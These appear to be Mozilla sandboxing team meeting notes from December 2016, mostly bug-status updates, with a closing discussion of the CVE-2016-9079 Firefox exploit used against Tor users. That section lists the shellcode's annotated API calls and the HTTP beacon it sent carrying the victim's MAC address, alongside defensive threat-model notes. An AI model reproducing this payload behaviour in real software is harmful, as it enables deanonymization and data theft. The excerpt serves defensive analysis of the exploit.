Security/Sandbox/2016-12-01


bobowen

  • bug 1147911 - Use a separate content process for file:// URLs
    • landed - working on follow-ups
  • bug 1279699 - Crash in OOM | large | mozalloc_abort | mozalloc_handle_oom | moz_xmalloc | std::_Allocate | std::basic_stringbuf<T>::overflow
    • landed fix to use temporary files instead.
    • uplifted to beta, but seems to have caused / uncovered crashes later on - investigating now.
  • bug 1273372 - [EME] Crash in mozilla::gmp::GMPChild::ProcessingError - (Applocker)
    • have patches for this that seem to work for reporter - need to get them up for review

tedd

  • bug 1104619 - Audio remoting
    • Had to rewrite a lot of code
    • Talked to billm, implementing his suggestions, move away from PBackground, implement my own top-level protocol
  • bug 1320085 - Fedora 26 prlimit64 issue - reviewed patch

aklotz

  • bug 1319640 - a11y+e10s+sandboxing+plugins = fun. Had to remote a call to AccessibleObjectFromWindow. r+, should land today

gcp

  • bug 1284912 - 2.88% ts_paint (linux64) regression on push 23140396a80eb27ff586c41fdc1cad62c875c9b1 (Tue Jul 5 2016)
  • Lots of investigation on Talos
  • bug 1309205 - "Print to file" fails silently on Ubuntu16.04LTS feedback from font people

haik

  • bug 1314056 - Enable Mac content sandbox level 1 in 52
    • Uplifted to Aurora (along with all dependencies)
  • bug 1309394 - Introduce automated tests to validate content process sandboxing works as intended
    • Got review comments from Bob, looking into using ContentTask.spawn instead
  • bug 1321053 - my cannon pixma printer will no longer print in grayscale, it will with safari, this is not a printer problem
    • Seems to be fixed already by remote printing for Mac, need to root cause

handyman

  • bug 1315325 - Add telemetry to measure use of NPAPI NPN Get/Post URL apis
    • review
  • bug 1185472 - Only allow NPAPI HWNDs to be adopted by an HWND in the chrome process.
    • review
  • bug 1284897 - 64 bit Flash Player has storage permissions issues
    • review
  • bug 1273091 - Mouse cursor does not disappear in html5 fullscreen video on Windows
    • landed
    • waiting for regressions. If none, uplift to Aurora/Beta

jld

  • bug 1320085 - Deal with using prlimit64 to implement getrlimit: landed
  • bug 1257361: wrote patch
  • bug 1320834 - restrict prctl for desktop: filed and investigated
    • (dup of bug 1302714?, should mark 1302714 as dup of this one, you have more information)
    • (Oops. —jld)

round table

  • sandbox meet up in Hawaii ---> Wednesday @ 1pm
    • discussion points / goals
    • other people we might want to meet with? (gfx?)
  • Friday security meeting / standups
  • dinner in Hawaii? We have a stipend to spend and there are a number of restaurants.
  • bug 1286865 - non-fatal sandbox violation reporting
    • What does Chrome do?
  • Network isolation blockers?
    • Tests — Linux only, or all platforms?
    • PulseAudio.
    • What controls net access on Windows?
  • haik PTO

exploit CVE-2016-9079

<gcp> https://paste.sh/ShvF8IRP#o2CC1uJifewgaLtX1agM8r3w
<gcp> annotated shellcode
<gcp> LoadLibraryA
<gcp> ws2_32_WSAStartup
<gcp> ws2_32_WSASocketA
<gcp> iphlpapi_SendARP
<gcp> ; GET /0a821a80/05dc0212 HTTP/1.1
<gcp> ; Host: User-PC
<gcp> ; Cookie: MC=08002703DFB8
<gcp> ; Accept-Encoding: gzip

  • Current Windows/Linux sandboxing wouldn't help deanonymization, but might interfere with modifying the exploit to leave a rootkit instead.
  • Mac sandbox already disallows network-outbound.
  • Threat models:
    • Network access bypassing Tor proxy
    • Obtaining PII somehow, exfiltrating via normal HTTP(S)

some "analysis" https://blog.gdatasoftware.com/2016/11/29346-firefox-0-day-targeting-tor-users (haven't looked at it yet, a friend pointed me to it), not very in-depth, but might be worth a read